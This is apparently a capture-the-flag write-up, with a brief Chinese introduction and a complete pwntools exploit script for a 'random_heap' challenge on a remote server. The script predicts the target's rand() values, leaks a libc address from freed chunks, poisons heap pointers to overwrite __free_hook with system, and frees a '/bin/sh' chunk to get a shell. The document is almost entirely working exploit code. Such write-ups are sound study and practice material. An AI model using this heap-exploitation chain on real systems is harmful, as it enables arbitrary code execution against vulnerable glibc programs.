题目的难度在于他chunk分配的地址是随机的。
如何能破掉这种随机。
我采取的方法是硬爆破,直到爆破到我想要的那种形式,我们加以利用。
爆破的过程中可以稍加采取限制,减少爆破时间。
# -*- coding: utf-8 -*-
from pwn import*
from ctypes import *
#context.log_level='debug'
context.arch='amd64'
context.os = "linux"
#context.terminal = ["tmux", "splitw", "-h"]
local = 0
if local:
r = process('./random_heap')
else:
r = remote("124.71.140.198", 49153)
sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
#libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6")
libc = ELF("./libc-2.27.so")
libcc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
def debug():
gdb.attach(r)
pause()
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def add(index, size):
sla("Your choice: ", "1")
sla("Index: ", str(index))
sla("Size: ", str(size))
def edit(index, content):
sla("Your choice: ", "2")
sla("Index: ", str(index))
sla("Content: ", content)
def show(index):
sla("Your choice: ", "3")
sla("Index: ", str(index))
def delete(index):
sla("Your choice: ", "4")
sla("Index: ", str(index))
v0 = libcc.time(0)
libcc.srand(v0)
for i in range(64):
add(i, 0x80)
a = libcc.rand()
for i in range(64):
delete(i)
s = ""
for i in range(64):
show(i)
s = ru("\n")
if len(s) > 15 and s[14] == '\x7f':
break
malloc_hook = (u64(s[9:15].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
lg("libc_base", libc_base)
for i in range(64):
edit(i, p64(free_hook))
ss = ['a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a','a']
for i in range(63):
add(i, 0x80)
edit(i, '/bin/sh\x00')
a = libcc.rand() & 0xf
print int(a)
if ss[int(a)] == 'b':
edit(i, p64(system_addr))
break
ss[int(a)] = "b"
print ss
delete(0)
sl("cat flag")
r.interactive()
